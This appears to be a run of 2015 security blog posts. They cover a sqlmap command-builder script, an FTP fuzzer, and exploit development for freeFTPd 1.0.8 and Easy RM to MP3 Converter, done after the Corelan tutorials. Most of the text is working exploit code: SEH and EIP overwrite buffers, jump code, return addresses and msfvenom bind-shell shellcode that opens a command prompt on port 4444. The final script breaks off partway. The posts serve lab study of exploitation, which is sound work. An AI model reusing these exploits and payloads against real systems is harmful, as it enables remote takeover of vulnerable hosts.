Wednesday, July 22, 2015

Python script to convert an HTTP Web Request to a sqlmap Command

Today I was working with OWASP ZAP and sqlmap for some testing.  I found that for the testing that I was doing I needed a script to automate the creation of the sqlmap command from the input of a HTTP web request.  I will demonstrate how I am utilizing it below:

Below is a screen shot of OWASP ZAP area where the request is shown after it is configured to show a combined view of the header and the content.


This is an example of an HTTP POST request during the login stage of getting into DVWA.  Then inside this box you can right-click, hover over Save Raw, Request, and then click on All.  This will bring up a save dialog box.  Where you saved the below script, create a folder called "requests".  Then save the HTTP Request in that folder.  If you are running Kali you do not need to be root to execute this script.

Here is the script that converts the POST Request into a sqlmap command and then it will execute it upon a key press:



#!/usr/bin/python

import os
import sys

additionalParameters='--dbms=mysql --level=5 --risk=3'


def checkDir():
 if not (os.path.exists("requests")):
  print "This must be the first time you have used this script."
  print
  print "Creating a directory called 'requests'.  This is where"
  print "you can save the web requests you would like formatted"
  print "for sqlmap."
  print
  os.makedirs("requests")

def getFileName():
 if (len(os.listdir('requests')) == 0):
  print "Inside this directory is another directory called requests."
  print "Currently this directory is empty, please add to this directory"
  print "the saved web requests that you would like formatted for sqlmap."
  print 
  print "Example: In OWASP ZAP 2.4 where the web request is located,"
  print "change the display to be combined with the header and the"
  print "body.  Then right-click and Save Raw --> Request --> All."
  print "Then navigate to the requests directory and save it.  You"
  print "can save more than one file and then select which one to"
  print "format."
  print

 else:
  print "Select which file to format:"
  files = os.listdir('requests')
  count = 1
  for f in files:
   print str(count) + ". " + f
   count += 1
  print
  fileNum = raw_input ("$ ")
  fileNum = int(fileNum) - 1
  return files[fileNum]

def parseFilename(fileName):
 fileName = 'requests/' + fileName
 file = open(fileName, 'r')
 # Count the number of lines in the file
 lineCount = 0
 for count in file:
  lineCount += 1
 file = open(fileName, 'r')
 count = 0
 requestType = ''
 cookieInfo = ''
 for line in file:
  count += 1
  if "POST" in line:
   lineList = line.split(' ')
   requestType = lineList[0]
   url = lineList[1]
  elif "GET" in line:
   lineList = line.split(' ')
   requestType = lineList[0]
   url = lineList[1]
  elif "User-Agent: " in line:
   userAgent = line[12:-2]
  elif "Cookie: " in line:
   cookieInfo = line[8:-2]
  elif (count == lineCount) & (requestType == 'POST'):
   dataInfo = line
   dataInfo = dataInfo[:-2]
 print 
 sqlMapString = "sqlmap -u '"
 sqlMapString += url + "' "
 if (requestType == 'POST'):
  sqlMapString += "--data='" + dataInfo + "' "
 if (cookieInfo <> ''):
  sqlMapString += "--cookie='" + cookieInfo + "' "
 sqlMapString += "--headers='" + userAgent + "' "
 sqlMapString += " " + additionalParameters
 print
 print "# Additional Parameters of " + additionalParameters 
 print "# These can be modified in the first few lines of the script"
 print
 print sqlMapString
 print
 return sqlMapString
 
def executeCommand(c):
 raw_input ("Hit any key to execute the above sqlmap command.")
 os.system(c)
 
def main():
 print 
 print "## SQLMap Format Script"
 checkDir()
 openFilename = getFileName()
 sqlmapCommand = parseFilename(openFilename)
 executeCommand(sqlmapCommand)

if __name__ == "__main__":
    main()



After you execute the above script you get the following output:



$ ./sqlmap-tool.py 

## SQLMap Format Script
Select which file to format:
1. requests-1678.raw
2. requests-1665.raw
3. requests-1664.raw

$ 1


# Additional Parameters of --dbms=mysql --level=5 --risk=3
# These can be modified in the first few lines of the script

sqlmap -u 'http://127.0.0.1/dvwa/login.php' --data='username=admin&password=password&Login=Log' --cookie='security=high; PHPSESSID=ec135ql5k3j6irk2j0ammp5l94' --headers='Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0'  --dbms=mysql --level=5 --risk=3

Hit any key to execute the above sqlmap command.



If you place more than one file in the 'requests' directory, as shown above you can choose which file you would like to format and then upon key press execute the command.  One item to note is the additional parameters.  These can be adjusted by modifying the respective line in the python script.

Wednesday, July 8, 2015

Fuzzer for freeFTPd 1.0.8

From working with freeFTPd 1.0.8 in the previous post and finding that a buffer overflow could occur on the username field if I enabled logging.  I build the below script to test other functions of the FTP server.  I developed the below fuzzer to identify them, however none surfaced.  I also experimented with unicode characters.



#!/usr/bin/python

import socket

server = '172.16.102.142' # Change to the IP Address of Windows 7 SP1 VM
destPort = 21

hexValues = ["\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x09","\x0a","\x0b","\x0c","\x0d","\x0e","\x0f","\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1a","\x1b","\x1c","\x1d","\x1e","\x1f","\x20","\x21","\x22","\x23","\x24","\x25","\x26","\x27","\x28","\x29","\x2a","\x2b","\x2c","\x2d","\x2e","\x2f","\x30","\x31","\x32","\x33","\x34","\x35","\x36","\x37","\x38","\x39","\x3a","\x3b","\x3c","\x3d","\x3e","\x3f","\x40","\x41","\x42","\x43","\x44","\x45","\x46","\x47","\x48","\x49","\x4a","\x4b","\x4c","\x4d","\x4e","\x4f","\x50","\x51","\x52","\x53","\x54","\x55","\x56","\x57","\x58","\x59","\x5a","\x5b","\x5c","\x5d","\x5e","\x5f","\x60","\x61","\x62","\x63","\x64","\x65","\x66","\x67","\x68","\x69","\x6a","\x6b","\x6c","\x6d","\x6e","\x6f","\x70","\x71","\x72","\x73","\x74","\x75","\x76","\x77","\x78","\x79","\x7a","\x7b","\x7c","\x7d","\x7e","\x7f","\x80","\x81","\x82","\x83","\x84","\x85","\x86","\x87","\x88","\x89","\x8a","\x8b","\x8c","\x8d","\x8e","\x8f","\x90","\x91","\x92","\x93","\x94","\x95","\x96","\x97","\x98","\x99","\x9a","\x9b","\x9c","\x9d","\x9e","\x9f","\xa0","\xa1","\xa2","\xa3","\xa4","\xa5","\xa6","\xa7","\xa8","\xa9","\xaa","\xab","\xac","\xad","\xae","\xaf","\xb0","\xb1","\xb2","\xb3","\xb4","\xb5","\xb6","\xb7","\xb8","\xb9","\xba","\xbb","\xbc","\xbd","\xbe","\xbf","\xc0","\xc1","\xc2","\xc3","\xc4","\xc5","\xc6","\xc7","\xc8","\xc9","\xca","\xcb","\xcc","\xcd","\xce","\xcf","\xd0","\xd1","\xd2","\xd3","\xd4","\xd5","\xd6","\xd7","\xd8","\xd9","\xda","\xdb","\xdc","\xdd","\xde","\xdf","\xe0","\xe1","\xe2","\xe3","\xe4","\xe5","\xe6","\xe7","\xe8","\xe9","\xea","\xeb","\xec","\xed","\xee","\xef","\xf0","\xf1","\xf2","\xf3","\xf4","\xf5","\xf6","\xf7","\xf8","\xf9","\xfa","\xfb","\xfc","\xfd","\xfe","\xff"]

unicodeValues = ["\ufeff","\u202e","\u180e"]

commands = ["MKD", "STOR", "CWD", "RETR", "DELE", "LIST"] 

for i in range(0,len(hexValues)):
#for i in range(0,len(unicodeValues)):
 for command in commands:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  connect = s.connect((server, destPort))
  bufCreated = hexValues[i] * 3000
  #print bufCreated
  # Receive the Banner that is returned after the initial connection
  #s.recv(1024)
  print s.recv(1024)
  print i

  # Send the username to login with
  userString = "USER ftp" + "\r\n"
  s.send(userString)
  #s.recv(1024)
  print s.recv(1024)

  # Send the password to login with
  passString = "PASS ftp" + "\r\n"
  s.send(passString)
  print s.recv(1024)

  ftpRequest = command + bufCreated + "\r\n"
  s.send(ftpRequest)
  print s.recv(1024)

  s.close()





Tuesday, July 7, 2015

freeFTPd 1.0.8 - SEH Stack Based Overflow

Exploiting the freeFTPd 1.0.8 server that has an SEH Stack Based Overflow.  This is already documented as a metasploit module and other exploits that have been published.  I have downloaded the vulnerable freeFTPd 1.0.8 server from here.  Then I installed it on Windows XP SP2 with Immunity Debugger.  To configure the freeFTPd server create a user with username of ftp and a password of ftp.  Then enable logging so it writes to a file.

First I created a python script to simulate a logon:



#!/usr/bin/python

import socket

server = '172.16.104.42' # Change to the IP Address of Windows XP SP2 VM
destPort = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

# Receive the Banner that is returned after the initial connection
print s.recv(1024)

# Send the username to login with
userString = "USER ftp\r\n"
s.send(userString)
print userString
print s.recv(1024)

# Send the password to login with
passString = "PASS ftp\r\n"
s.send(passString)
print passString
print s.recv(1024)

s.close()


Then in the script I introduced a string that is appended for the username of FTP 1500 characters.  After this the change to the script is made and the script is executed in Immunity Debugger you can observe the ECX register contains the all A's and an Access Violation is present at the bottom of the debugger window.  Then if you scroll down in the window that is in the bottom-right corner you will find that the A's overright an SEH handler on the stack.


Then utilizing the pattern_create tool, created a pattern of 1500 characters.  Then after pressing <shift>+F7 to step through the access violation you find that part of the pattern is returned in the EIP pointer.


 Then plugging the value into the pattern_offset tool you find that the size is 1004 bytes into the pattern.


With modifying the buffer that is sent to buf = "A"*1004 + "B"*4 + "C"*4 + "D"*4 you should be able to see on the stack if you have the correct offset if the following occurs:

We can see that the "Pointer to next SEH record" has B, in the "SE handler" only C's exist and then D's exist after this.  The script that I generated is below to cause the above screenshot.



#!/usr/bin/python

import socket

server = '172.16.102.142' # Change to the IP Address of Windows XP SP2 VM
destPort = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

bufCreated = "A"*1004
bufCreated += "B"*4
bufCreated += "C"*4
bufCreated += "D"*4

# Receive the Banner that is returned after the initial connection
print s.recv(1024)

# Send the username to login with
userString = "USER " + bufCreated + "\r\n"
s.send(userString)
print userString
print s.recv(1024)

# Send the password to login with
passString = "PASS ftp" + "\r\n"
s.send(passString)
print passString
print s.recv(1024)

s.close()


Now we need to find a memory address that will allow us to overwrite the SEH value.  To do this we are going to use a pycommand called mona.py which can be downloaded from here.  In the previous post I talk more about how to setup mona.  I executed mona.py and received the following results.

From the output we find 3 memory addresses that could possibly be used.  Notice that the 3rd address however, contains a 00 in the address which would act as a NULL character in a string.  We may have to be careful with this address.  I am going to use the 0x7ffc054d address in the exploit.  Then I am going to place in the next SEH address that of a breakpoint so I can evaluate the registers.  The above code I modified to look like the following screenshot.


After executing the script with the above changes and bypassing the first access violation by hitting <shift + F9> then you hit the breakpoint as shown in the below screenshot.


The above screenshot is a busy screenshot but shows us a lot of information we need to know.  Notice in the top left of the CPU window we are at a breakpoint, in the top-right corner we notice the stack pointer (ESP) is located at 0x0012aea0, and then in the lower right window we see that the A's where I will place my shellcode.  The memory address of where the A's begin is roughly 0x0012b2ec.

So in my jump code I need to somehow go to memory address 0x0012b2ec.  To accomplish this I click on one of the INT3 instructions and then hit the space bar.  Then in the text box type jmp and the memory address on the stack that you wish to jump to.  The below screenshot occurs if you did this correct.


Then click assemble and it modifies the assembly as shown below:


We find that the assembly instructions that we would like to use for our jumpcode.  The instructions are "\xe9\x16\xfc\xff\xff".  With the above information we should be able to craft the exploit.  I have provided the proof-of-concept code below.



#!/usr/bin/python

import socket

server = '172.16.102.142' # Change to the IP Address of Windows XP SP2 VM
destPort = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\xd3\xa8\x3c\xaa\xdb\xc6\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x53\x31\x5f\x12\x03\x5f\x12\x83\x3c\x54\xde"
buf += "\x5f\x3e\x4d\x9d\xa0\xbe\x8e\xc2\x29\x5b\xbf\xc2\x4e"
buf += "\x28\x90\xf2\x05\x7c\x1d\x78\x4b\x94\x96\x0c\x44\x9b"
buf += "\x1f\xba\xb2\x92\xa0\x97\x87\xb5\x22\xea\xdb\x15\x1a"
buf += "\x25\x2e\x54\x5b\x58\xc3\x04\x34\x16\x76\xb8\x31\x62"
buf += "\x4b\x33\x09\x62\xcb\xa0\xda\x85\xfa\x77\x50\xdc\xdc"
buf += "\x76\xb5\x54\x55\x60\xda\x51\x2f\x1b\x28\x2d\xae\xcd"
buf += "\x60\xce\x1d\x30\x4d\x3d\x5f\x75\x6a\xde\x2a\x8f\x88"
buf += "\x63\x2d\x54\xf2\xbf\xb8\x4e\x54\x4b\x1a\xaa\x64\x98"
buf += "\xfd\x39\x6a\x55\x89\x65\x6f\x68\x5e\x1e\x8b\xe1\x61"
buf += "\xf0\x1d\xb1\x45\xd4\x46\x61\xe7\x4d\x23\xc4\x18\x8d"
buf += "\x8c\xb9\xbc\xc6\x21\xad\xcc\x85\x2d\x02\xfd\x35\xae"
buf += "\x0c\x76\x46\x9c\x93\x2c\xc0\xac\x5c\xeb\x17\xd2\x76"
buf += "\x4b\x87\x2d\x79\xac\x8e\xe9\x2d\xfc\xb8\xd8\x4d\x97"
buf += "\x38\xe4\x9b\x02\x30\x43\x74\x31\xbd\x33\x24\xf5\x6d"
buf += "\xdc\x2e\xfa\x52\xfc\x50\xd0\xfb\x95\xac\xdb\x12\x3a"
buf += "\x38\x3d\x7e\xd2\x6c\x95\x16\x10\x4b\x2e\x81\x6b\xb9"
buf += "\x06\x25\x23\xab\x91\x4a\xb4\xf9\xb5\xdc\x3f\xee\x01"
buf += "\xfd\x3f\x3b\x22\x6a\xd7\xb1\xa3\xd9\x49\xc5\xe9\x89"
buf += "\xea\x54\x76\x49\x64\x45\x21\x1e\x21\xbb\x38\xca\xdf"
buf += "\xe2\x92\xe8\x1d\x72\xdc\xa8\xf9\x47\xe3\x31\x8f\xfc"
buf += "\xc7\x21\x49\xfc\x43\x15\x05\xab\x1d\xc3\xe3\x05\xec"
buf += "\xbd\xbd\xfa\xa6\x29\x3b\x31\x79\x2f\x44\x1c\x0f\xcf"
buf += "\xf5\xc9\x56\xf0\x3a\x9e\x5e\x89\x26\x3e\xa0\x40\xe3"
buf += "\x40\x50\x58\xfe\xd5\xcb\x09\x43\xb8\xeb\xe4\x80\xc5"
buf += "\x6f\x0c\x79\x32\x6f\x65\x7c\x7e\x37\x96\x0c\xef\xd2"
buf += "\x98\xa3\x10\xf7"

bufCreated = "A"*1004
bufCreated = "\x90"*500
bufCreated += buf   # Payload generated by msfvenom
bufCreated += "\x90" * (1004 - len(bufCreated))
bufCreated += "\xeb\x04\x90\x90" # nSEH
bufCreated += "\x4d\x05\xfc\x7f" # SEH
bufCreated += "\x90"*8   # Small NOP Sled
bufCreated += "\xe9\x16\xfc\xff\xff" # JMP to where NOP Sled and Shellcode exist
bufCreated += "\x90"*8   # Small NOP Sled

# Receive the Banner that is returned after the initial connection
print s.recv(1024)

# Send the username to login with
userString = "USER " + bufCreated + "\r\n"
s.send(userString)
print userString
print s.recv(1024)

# Send the password to login with
passString = "PASS ftp" + "\r\n"
s.send(passString)
print passString
print s.recv(1024)

s.close()



Then after executing the script we can then connect to port 4444 using netcat and receive a command prompt.


This post is meant to be used for educational purposes only to demonstrate an SEH bypass exploit of freeFTPd 1.0.8.

Sunday, July 5, 2015

Reviewing Corelan Exploit Writing Part 2

I was reviewing the Corelan Exploit Tutotials Part 2 located here.  Below is the python code that I have created following the tutorial.

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb8\xdf\xd3\xa6\xb8\x3c\xa3\xc9\xe9\x93\xbf\x93\x29"
buf += "\x12\x13\xa8\x63\x0c\x70\x95\x3a\xa7\x42\x61\xbd\x61"
buf += "\x9b\x8a\x12\x4c\x13\x79\x6a\x89\x94\x62\x19\xe3\xe6"
buf += "\x1f\x1a\x30\x94\xfb\xaf\xa2\x3e\x8f\x08\x0e\xbe\x5c"
buf += "\xce\xc5\xcc\x29\x84\x81\xd0\xac\x49\xba\xed\x25\x6c"
buf += "\x6c\x64\x7d\x4b\xa8\x2c\x25\xf2\xe9\x88\x88\x0b\xe9"
buf += "\x72\x74\xae\x62\x9e\x61\xc3\x29\xf7\x46\xee\xd1\x07"
buf += "\xc1\x79\xa2\x35\x4e\xd2\x2c\x76\x07\xfc\xab\x79\x32"
buf += "\xb8\x23\x84\xbd\xb9\x6a\x43\xe9\xe9\x04\x62\x92\x61"
buf += "\xd4\x8b\x47\x1f\xdc\x2a\x38\x02\x21\x8c\xe8\x82\x89"
buf += "\x65\xe3\x0c\xf6\x96\x0c\xc7\x9f\x3f\xf1\xe8\x8e\xe3"
buf += "\x7c\x0e\xda\x0b\x29\x98\x72\xee\x0e\x11\xe5\x11\x65"
buf += "\x09\x81\x5a\x6f\x8e\xae\x5a\xa5\xb8\x38\xd1\xaa\x7c"
buf += "\x59\xe6\xe6\xd4\x0e\x71\x7c\xb5\x7d\xe3\x81\x9c\x15"
buf += "\x80\x10\x7b\xe5\xcf\x08\xd4\xb2\x98\xff\x2d\x56\x35"
buf += "\x59\x84\x44\xc4\x3f\xef\xcc\x13\xfc\xee\xcd\xd6\xb8"
buf += "\xd4\xdd\x2e\x40\x51\x89\xfe\x17\x0f\x67\xb9\xc1\xe1"
buf += "\xd1\x13\xbd\xab\xb5\xe2\x8d\x6b\xc3\xea\xdb\x1d\x2b"
buf += "\x5a\xb2\x5b\x54\x53\x52\x6c\x2d\x89\xc2\x93\xe4\x09"
buf += "\xf2\xd9\xa4\x38\x9b\x87\x3d\x79\xc6\x37\xe8\xbe\xff"
buf += "\xbb\x18\x3f\x04\xa3\x69\x3a\x40\x63\x82\x36\xd9\x06"
buf += "\xa4\xe5\xda\x02"

file = open("5.m3u", "w")
junk = "\x41"*26059
# 1 - works
# Searched for jmp esp in all commands and found one without \x00 in the address
# Address for JMP ESP 0x01a8f23a - This address goes in as EIP
#eip  = "\x3a\xf2\xa8\x01"

# 2 - works
# Searched for call esp in all commands
# Address for CALL ESP 0x5d091421   ## Worked
# Address for CALL ESP 0x773d1419
#eip = "\x21\x14\x09\x5d"

# 3 - works
# Searched for POP r32 POP r32 RETN
# This pops 2 addresses off of the stack and then places the next address in EIP
# Address 0x01851118
# POP ESI
# POP EBP
# RETN
eip = "\x18\x11\x85\x01"
junk += eip
junk += "C"*4 # Offset to where the ESP points to
junk += "\x90" * 8
# Searched for jmp esp in all commands and found one without \x00 in the address
# Address for JMP ESP 0x01a8f23a - This address goes in as EIP
junk += "\x3a\xf2\xa8\x01"
junk += "\x90" * 100
junk += buf
junk += "\x41" * (30000 - len(junk))

file.write(junk)
file.close()

# v1 Script
# Using a "call esp"


This is the second script...

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb8\xdf\xd3\xa6\xb8\x3c\xa3\xc9\xe9\x93\xbf\x93\x29"
buf += "\x12\x13\xa8\x63\x0c\x70\x95\x3a\xa7\x42\x61\xbd\x61"
buf += "\x9b\x8a\x12\x4c\x13\x79\x6a\x89\x94\x62\x19\xe3\xe6"
buf += "\x1f\x1a\x30\x94\xfb\xaf\xa2\x3e\x8f\x08\x0e\xbe\x5c"
buf += "\xce\xc5\xcc\x29\x84\x81\xd0\xac\x49\xba\xed\x25\x6c"
buf += "\x6c\x64\x7d\x4b\xa8\x2c\x25\xf2\xe9\x88\x88\x0b\xe9"
buf += "\x72\x74\xae\x62\x9e\x61\xc3\x29\xf7\x46\xee\xd1\x07"
buf += "\xc1\x79\xa2\x35\x4e\xd2\x2c\x76\x07\xfc\xab\x79\x32"
buf += "\xb8\x23\x84\xbd\xb9\x6a\x43\xe9\xe9\x04\x62\x92\x61"
buf += "\xd4\x8b\x47\x1f\xdc\x2a\x38\x02\x21\x8c\xe8\x82\x89"
buf += "\x65\xe3\x0c\xf6\x96\x0c\xc7\x9f\x3f\xf1\xe8\x8e\xe3"
buf += "\x7c\x0e\xda\x0b\x29\x98\x72\xee\x0e\x11\xe5\x11\x65"
buf += "\x09\x81\x5a\x6f\x8e\xae\x5a\xa5\xb8\x38\xd1\xaa\x7c"
buf += "\x59\xe6\xe6\xd4\x0e\x71\x7c\xb5\x7d\xe3\x81\x9c\x15"
buf += "\x80\x10\x7b\xe5\xcf\x08\xd4\xb2\x98\xff\x2d\x56\x35"
buf += "\x59\x84\x44\xc4\x3f\xef\xcc\x13\xfc\xee\xcd\xd6\xb8"
buf += "\xd4\xdd\x2e\x40\x51\x89\xfe\x17\x0f\x67\xb9\xc1\xe1"
buf += "\xd1\x13\xbd\xab\xb5\xe2\x8d\x6b\xc3\xea\xdb\x1d\x2b"
buf += "\x5a\xb2\x5b\x54\x53\x52\x6c\x2d\x89\xc2\x93\xe4\x09"
buf += "\xf2\xd9\xa4\x38\x9b\x87\x3d\x79\xc6\x37\xe8\xbe\xff"
buf += "\xbb\x18\x3f\x04\xa3\x69\x3a\x40\x63\x82\x36\xd9\x06"
buf += "\xa4\xe5\xda\x02"

file = open("11.m3u", "w")

#pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

#junk = pattern
#junk += "\x41"*25059

# 4 - Script
# Doing a push return will take and push the address of the register on the stack
# Then return to the stack
# PUSH ESP
# RETN
# 0x0191cd65
#eip = "\x65\xcd\x91\x01"

# 5 - Script
# Placed a pattern of 1000 from metasploit
# Then found that the pattern starts 257 in on the pattern for the offset

junk = "A" * 250
junk += "\x90" * 50  # Placed some NOPs to slide to the shellcode verses guessing exactly
junk += buf  # Placed our shellcode at an offset of 300
junk += "A" * (26059 - len(junk))

#eip = "BBBB"
# Address for CALL ESP 0x5d091421   ## Worked
eip = "\x21\x14\x09\x5d"

junk += eip
#junk += "X" * 54  # Create our jumpcode
# add esp, 0x5e  (ESP + 94)
# add esp, 0x5e  (ESP + 94)
# add esp, 0x5e  (ESP + 94) - 282 Bytes after the current location of the stack pointer
# jmp esp

# https://defuse.ca/online-x86-assembler.htm
# Jump Code - "\x83\xC4\x5E\x83\xC4\x5E\x83\xC4\x5E\xFF\xE4"

junk += "X" * 4
junk += "\x83\xc4\x5e\x83\xc4\x5e\x83\c4\x5e\xff\xe4"
junk += "\x90" * 10

file.write(junk)
file.close()

# v1 Script
# Using a "call esp"

Thursday, July 2, 2015

Reviewing Corelan Exploit Writing Part 1

I reviewed the exploit writing tutorial that Corelan makes available here.  After going through the tutorial I developed the following final script that will create the m3u file that overwrites the EIP with a JMP to ESP in the dlls of the Easy RM to MP3 Converter.  

My final script is below:

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb8\xdf\xd3\xa6\xb8\x3c\xa3\xc9\xe9\x93\xbf\x93\x29"
buf += "\x12\x13\xa8\x63\x0c\x70\x95\x3a\xa7\x42\x61\xbd\x61"
buf += "\x9b\x8a\x12\x4c\x13\x79\x6a\x89\x94\x62\x19\xe3\xe6"
buf += "\x1f\x1a\x30\x94\xfb\xaf\xa2\x3e\x8f\x08\x0e\xbe\x5c"
buf += "\xce\xc5\xcc\x29\x84\x81\xd0\xac\x49\xba\xed\x25\x6c"
buf += "\x6c\x64\x7d\x4b\xa8\x2c\x25\xf2\xe9\x88\x88\x0b\xe9"
buf += "\x72\x74\xae\x62\x9e\x61\xc3\x29\xf7\x46\xee\xd1\x07"
buf += "\xc1\x79\xa2\x35\x4e\xd2\x2c\x76\x07\xfc\xab\x79\x32"
buf += "\xb8\x23\x84\xbd\xb9\x6a\x43\xe9\xe9\x04\x62\x92\x61"
buf += "\xd4\x8b\x47\x1f\xdc\x2a\x38\x02\x21\x8c\xe8\x82\x89"
buf += "\x65\xe3\x0c\xf6\x96\x0c\xc7\x9f\x3f\xf1\xe8\x8e\xe3"
buf += "\x7c\x0e\xda\x0b\x29\x98\x72\xee\x0e\x11\xe5\x11\x65"
buf += "\x09\x81\x5a\x6f\x8e\xae\x5a\xa5\xb8\x38\xd1\xaa\x7c"
buf += "\x59\xe6\xe6\xd4\x0e\x71\x7c\xb5\x7d\xe3\x81\x9c\x15"
buf += "\x80\x10\x7b\xe5\xcf\x08\xd4\xb2\x98\xff\x2d\x56\x35"
buf += "\x59\x84\x44\xc4\x3f\xef\xcc\x13\xfc\xee\xcd\xd6\xb8"
buf += "\xd4\xdd\x2e\x40\x51\x89\xfe\x17\x0f\x67\xb9\xc1\xe1"
buf += "\xd1\x13\xbd\xab\xb5\xe2\x8d\x6b\xc3\xea\xdb\x1d\x2b"
buf += "\x5a\xb2\x5b\x54\x53\x52\x6c\x2d\x89\xc2\x93\xe4\x09"
buf += "\xf2\xd9\xa4\x38\x9b\x87\x3d\x79\xc6\x37\xe8\xbe\xff"
buf += "\xbb\x18\x3f\x04\xa3\x69\x3a\x40\x63\x82\x36\xd9\x06"
buf += "\xa4\xe5\xda\x02"

file = open("6crash.m3u", "w")
junk = "\x41"*26059
# Searched for jmp esp in all commands and found one without \x00 in the address
